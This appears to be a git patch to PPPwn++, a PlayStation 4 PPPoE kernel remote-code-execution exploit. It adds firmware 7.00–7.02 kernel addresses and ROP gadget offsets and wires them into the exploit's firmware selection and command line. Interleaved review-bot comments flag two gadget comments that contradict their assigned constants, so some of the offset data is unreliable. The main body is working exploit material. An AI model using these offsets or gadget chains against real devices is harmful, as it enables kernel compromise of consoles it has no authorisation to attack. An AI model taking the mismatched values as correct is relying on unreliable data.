From 469101a775ae83d0cfb7475ffb2b42dcd9b7919f Mon Sep 17 00:00:00 2001
From: xfangfang <2553041586@qq.com>
Date: Sat, 18 May 2024 02:07:24 +0800
Subject: [PATCH] Added PS4 7.00 7.01 7.02 Offsets (#3)
https://github.com/TheOfficialFloW/PPPwn/pull/59
---
 include/offset.h | 167 +++++++++++++++++++++++++++++++++++++----------
 src/exploit.cpp | 3 +
 src/main.cpp | 20 +++---
 3 files changed, 148 insertions(+), 42 deletions(-)
diff --git a/include/offset.h b/include/offset.h
index 8bc4654..311c3bd 100644
--- a/include/offset.h
+++ b/include/offset.h
@@ -1,6 +1,7 @@
 #pragma once
 enum FirmwareVersion {
+ FIRMWARE_700_702 = 700,
 FIRMWARE_750_755 = 750,
 FIRMWARE_800_803 = 800,
 FIRMWARE_850_852 = 850,
@@ -15,43 +16,141 @@ enum FirmwareVersion {
 class OffsetsFirmware {
 public:
- uint64_t PPPOE_SOFTC_LIST;
- uint64_t KERNEL_MAP;
- uint64_t SETIDT;
- uint64_t KMEM_ALLOC;
- uint64_t KMEM_ALLOC_PATCH1;
- uint64_t KMEM_ALLOC_PATCH2;
- uint64_t MEMCPY;
- uint64_t MOV_CR0_RSI_UD2_MOV_EAX_1_RET;
- uint64_t SECOND_GADGET_OFF;
- uint64_t FIRST_GADGET;
- uint64_t PUSH_RBP_JMP_QWORD_PTR_RSI;
- uint64_t POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10;
- uint64_t LEA_RSP_RSI_20_REPZ_RET;
- uint64_t ADD_RSP_28_POP_RBP_RET;
- uint64_t ADD_RSP_B0_POP_RBP_RET;
- uint64_t RET;
- uint64_t POP_RDI_RET;
- uint64_t POP_RSI_RET;
- uint64_t POP_RDX_RET;
- uint64_t POP_RCX_RET;
- uint64_t POP_R8_POP_RBP_RET;
- uint64_t POP_R12_RET;
- uint64_t POP_RAX_RET;
- uint64_t POP_RBP_RET;
- uint64_t PUSH_RSP_POP_RSI_RET;
- uint64_t MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX;
- uint64_t MOV_BYTE_PTR_RCX_AL_RET;
- uint64_t MOV_RDI_RBX_CALL_R12;
- uint64_t MOV_RDI_R14_CALL_R12;
- uint64_t MOV_RSI_RBX_CALL_RAX;
- uint64_t MOV_R14_RAX_CALL_R8;
- uint64_t ADD_RDI_RCX_RET;
- uint64_t SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET;
- uint64_t JMP_R14;
+ uint64_t PPPOE_SOFTC_LIST{};
+ uint64_t KERNEL_MAP{};
+ uint64_t SETIDT{};
+ uint64_t KMEM_ALLOC{};
+ uint64_t KMEM_ALLOC_PATCH1{};
+ uint64_t KMEM_ALLOC_PATCH2{};
+ uint64_t MEMCPY{};
+ uint64_t MOV_CR0_RSI_UD2_MOV_EAX_1_RET{};
+ uint64_t SECOND_GADGET_OFF{};
+ uint64_t FIRST_GADGET{};
+ uint64_t PUSH_RBP_JMP_QWORD_PTR_RSI{};
+ uint64_t POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10{};
+ uint64_t LEA_RSP_RSI_20_REPZ_RET{};
+ uint64_t ADD_RSP_28_POP_RBP_RET{};
+ uint64_t ADD_RSP_B0_POP_RBP_RET{};
+ uint64_t RET{};
+ uint64_t POP_RDI_RET{};
+ uint64_t POP_RSI_RET{};
+ uint64_t POP_RDX_RET{};
+ uint64_t POP_RCX_RET{};
+ uint64_t POP_R8_POP_RBP_RET{};
+ uint64_t POP_R12_RET{};
+ uint64_t POP_RAX_RET{};
+ uint64_t POP_RBP_RET{};
+ uint64_t PUSH_RSP_POP_RSI_RET{};
+ uint64_t MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX{};
+ uint64_t MOV_BYTE_PTR_RCX_AL_RET{};
+ uint64_t 
MOV_RDI_RBX_CALL_R12{};
+ uint64_t MOV_RDI_R14_CALL_R12{};
+ uint64_t MOV_RSI_RBX_CALL_RAX{};
+ uint64_t MOV_R14_RAX_CALL_R8{};
+ uint64_t ADD_RDI_RCX_RET{};
+ uint64_t SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET{};
+ uint64_t JMP_R14{};
 };
+/// FW 7.00 / 7.01 / 7.02
+class OffsetsFirmware_700_702: public OffsetsFirmware {
+public:
+ OffsetsFirmware_700_702() {
+ PPPOE_SOFTC_LIST = 0xffffffff844ad838;
+
+ KERNEL_MAP = 0xffffffff843c8ee0;
+
+ SETIDT = 0xffffffff82692400;
+
+ KMEM_ALLOC = 0xffffffff823170f0;
+ KMEM_ALLOC_PATCH1 = 0xffffffff823171be;
+ KMEM_ALLOC_PATCH2 = 0xffffffff823171c6;
+
+ MEMCPY = 0xffffffff8222ef80;
+
+ // 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
+ MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823b7169;
+
+ SECOND_GADGET_OFF = 0x3b;
+
+ // 0xffffffff822f52ed : jmp qword ptr [rsi + 0x3b]
+ FIRST_GADGET = 0xffffffff822f52ed;
+
+ // 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi]
+ PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c928d6;
+
+ // 0xffffffff82699bc1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
+ POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82699bc1;
+
+ // 0xffffffff82945dc6 : lea rsp, [rsi + 0x20] ; repz ret
+ LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82945dc6;
+
+ // 0xffffffff826d56ad : add rsp, 0x28 ; pop rbp ; ret
+ ADD_RSP_28_POP_RBP_RET = 0xffffffff826d56ad;
+
+ // 0xffffffff8252a48a : add rsp, 0xb0 ; pop rbp ; ret
+ ADD_RSP_B0_POP_RBP_RET = 0xffffffff8252a48a;
+
+ // 0xffffffff822005a1 : ret
+ RET = 0xffffffff822005a1;
+
+ // 0xffffffff8255325a : pop rdi ; ret
+ POP_RDI_RET = 0xffffffff8255325a;
+
+ // 0xffffffff8230d34e : pop rsi ; ret
+ POP_RSI_RET = 0xffffffff8230d34e;
+
+ // 0xffffffff8299ae06 : pop rdx ; ret
+ POP_RDX_RET = 0xffffffff8299ae06;
+
+ // 0xffffffff822563a6 : pop rcx ; ret
+ POP_RCX_RET = 0xffffffff822563a6;
+
+ // 0xffffffff82326dcd : pop r8 ; pop rbp ; ret
+ POP_R8_POP_RBP_RET = 0xffffffff82326dcd;
+
+ // 0xffffffff827d2b4f : pop r12 ; ret
+ POP_R12_RET = 0xffffffff827d2b4f;
+
+ // 
0xffffffff82407b54 : pop rax ; ret
+ POP_RAX_RET = 0xffffffff82407b54;
+
+ // 0xffffffff822008f2 : pop rbp ; ret
+ POP_RBP_RET = 0xffffffff822008f2;
+
+ // 0xffffffff82bd348a : push rsp ; pop rsi ; ret
+ PUSH_RSP_POP_RSI_RET = 0xffffffff82bd348a;
+
+ // 0xffffffff822fb490 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
+ MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff822fb490;
+
+ // 0xffffffff82b910ba : mov byte ptr [rcx], al ; ret
+ MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b910ba;
+
+ // 0xffffffff82644739 : mov rdi, rbx ; call r12
+ MOV_RDI_RBX_CALL_R12 = 0xffffffff82644739;
+
+ // 0xffffffff82644535 : mov rdi, r14 ; call r12
+ MOV_RDI_R14_CALL_R12 = 0xffffffff82644535;
+
+ // 0xffffffff822ad8e1 : mov rsi, rbx ; call rax
+ MOV_RSI_RBX_CALL_RAX = 0xffffffff822ad8e1;
+
+ // 0xffffffff8266a598 : mov r14, rax ; call r8
+ MOV_R14_RAX_CALL_R8 = 0xffffffff8266a598;
+
+ // 0xffffffff82cd2aca : add rdi, rcx ; ret
+ ADD_RDI_RCX_RET = 0xffffffff82cd2aca;
+
+ // 0xffffffff82583b8a : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
+ SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82583b8a;
+
+ // 0xffffffff82ba226b : jmp r14
+ JMP_R14 = 0xffffffff82ba226b;
+ }
+};
+
 /// FW 7.50 / 7.51 / 7.50
 class OffsetsFirmware_750_755 : public OffsetsFirmware {
 public:
diff --git a/src/exploit.cpp b/src/exploit.cpp
index fe9116c..164a3a6 100644
--- a/src/exploit.cpp
+++ b/src/exploit.cpp
@@ -132,6 +132,9 @@ LcpEchoHandler::~LcpEchoHandler() {
 int Exploit::setFirmwareVersion(FirmwareVersion version) {
 switch (version) {
+ case FirmwareVersion::FIRMWARE_700_702:
+ this->offs = OffsetsFirmware_700_702();
+ break;
 case FirmwareVersion::FIRMWARE_750_755:
 this->offs = OffsetsFirmware_750_755();
 break;
diff --git a/src/main.cpp b/src/main.cpp
index 0b86a43..8e488c5 100644
--- a/src/main.cpp
+++ b/src/main.cpp
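Review bot: Two of the new gadget comments in OffsetsFirmware_700_702 disagree with the constant assigned on the following line: `// 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret` precedes `MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823b7169;`, and `// 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi]` precedes `PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c928d6;`, whereas every other comment in the class repeats the address it documents. One side of each pair is stale and the commit does not say which, so the class comment should record where the values came from — something like `/// FW 7.00 / 7.01 / 7.02 — offsets taken from <source/build id>` — and the two comments should be corrected to match whatever was actually checked, or removed rather than left contradicting the code. A smaller style point: `class OffsetsFirmware_700_702: public OffsetsFirmware {` omits the space before the colon that the neighbouring `class OffsetsFirmware_750_755 : public OffsetsFirmware {` uses.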
@@ -112,6 +112,9 @@ void listInterfaces() {
 enum FirmwareVersion getFirmwareOffset(int fw) {
 std::unordered_map fw_choices = {
+ {700, FIRMWARE_700_702},
+ {701, FIRMWARE_700_702},
+ {702, FIRMWARE_700_702},
 {750, FIRMWARE_750_755},
 {750, FIRMWARE_750_755},
 {751, FIRMWARE_750_755},
@@ -138,6 +141,8 @@ enum FirmwareVersion getFirmwareOffset(int fw) {
 return fw_choices[fw];
 }
+#define SUPPORTED_FIRMWARE "{700,701,702,750,751,755,800,801,803,850,852,900,903,904,950,951,960,1000,1001,1050,1070,1071,1100}"
+
 int main(int argc, char *argv[]) {
 using namespace clipp;
 std::cout << "[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow" << std::endl;
@@ -146,14 +151,13 @@ int main(int argc, char *argv[]) {
 bool retry = false;
 auto cli = (
- (required("--interface").doc("network interface") & value("interface", interface),
- option("--fw").doc(
- "{750,751,755,800,801,803,850,852,900,903,904,950,951,960,1000,1001,1050,1070,1071,1100}") &
- integer("fw", fw),
- option("--stage1").doc("stage1 binary") & value("STAGE1", stage1),
- option("--stage2").doc("stage2 binary") & value("STAGE2", stage2),
- option("-a", "--auto-retry").doc("automatically retry when fails").set(retry)
- ) | command("list").doc("list interfaces").call(listInterfaces)
+ ("network interface" % required("--interface") & value("interface", interface), \
+ SUPPORTED_FIRMWARE % option("--fw") & integer("fw", fw), \
+ "stage1 binary" % option("--stage1") & value("STAGE1", stage1), \
+ "stage2 binary" % option("--stage2") & value("STAGE2", stage2), \
+ "automatically retry when fails" % option("-a", "--auto-retry").set(retry)
+ ) | \
+ "list interfaces" % command("list").call(listInterfaces)
 );
 auto result = parse(argc, argv, cli);
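Review bot: `SUPPORTED_FIRMWARE` is a hand-typed copy of the keys of `fw_choices`, which themselves mirror the `FirmwareVersion` enum and the switch in `Exploit::setFirmwareVersion`, so adding 7.00–7.02 meant touching four lists and nothing checks that they still agree. At minimum make it a typed constant next to the table with a comment naming the source of truth, e.g. `// Keep in sync with fw_choices in getFirmwareOffset().` above `static constexpr const char *kSupportedFirmware = "{700,...,1100}";`, or better derive the help text from the map's keys so it cannot drift. The lookup in the context line just above the macro, `return fw_choices[fw];`, value-inserts a zero `FirmwareVersion` for any version absent from the table, so the help string is the only thing telling a user which values are accepted; `if (const auto it = fw_choices.find(fw); it != fw_choices.end()) return it->second;` with an explicit error path afterwards would make the table and the help text enforce the same set. The body of `getFirmwareOffset` starts outside the hunk, so what the caller expects on an unknown version is inferred, not visible here.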
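Review bot: The trailing `\` on the new clipp lines, from `("network interface" % required("--interface") & value("interface", interface), \` through `) | \`, are line splices that buy nothing inside an ordinary expression, and they are fragile: a `\` that is not the very last character on the line is a stray token, which GCC only downgrades to the warning `backslash and newline separated by space` and other compilers reject outright. Drop the backslashes and let the expression break naturally at the commas, as the removed lines did. The `"doc" % option(...)` form itself is a readable improvement; `main` continues past the end of the hunk.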